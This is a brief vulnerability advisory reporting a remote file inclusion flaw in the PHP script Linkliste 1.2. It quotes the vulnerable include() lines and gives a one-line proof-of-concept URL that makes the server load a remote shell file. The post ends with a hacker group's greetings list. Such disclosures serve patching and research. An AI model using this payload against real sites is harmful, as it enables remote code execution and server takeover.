Hi ,founded a new bug on this script ,I wanted to ask you if you could post
it in securityvulns.com (thanks in advance … iNs)
Here what should be posted :
App Name : Linkliste Version 1.2
HomePage : http://www.mapos-scripts.de/downloads.php?download=3
Vuln type : Remote File Include (RFI)
Vuln Discovered by : iNs
Vuln Code:
index.php
include($styl[top]);
also
include($url_eintrag);
also
include($styl[themen]);
Note:
All this vars are not defined before ,so can be included a remote malicious
code.
POC:
htttp://site.com/[path]/index.php?styl[top]=SHELL.txt??
iNs @ uNkn0wn.eu
Gr33tz t0:
uNkn0wn.eu - iD - Stel128 - Spitfire - fEaRz - R1der - Stranger21 - nexos -
sh4m4n - Svarshik
DRT Memb3rz - s[H]4g - deL - l10m - l1l - r00tm1nd - f|_|ck3r - p1mmy
ActiveSpy - r100z - The_PitBull
.: uNkn0wn.eu CreW :.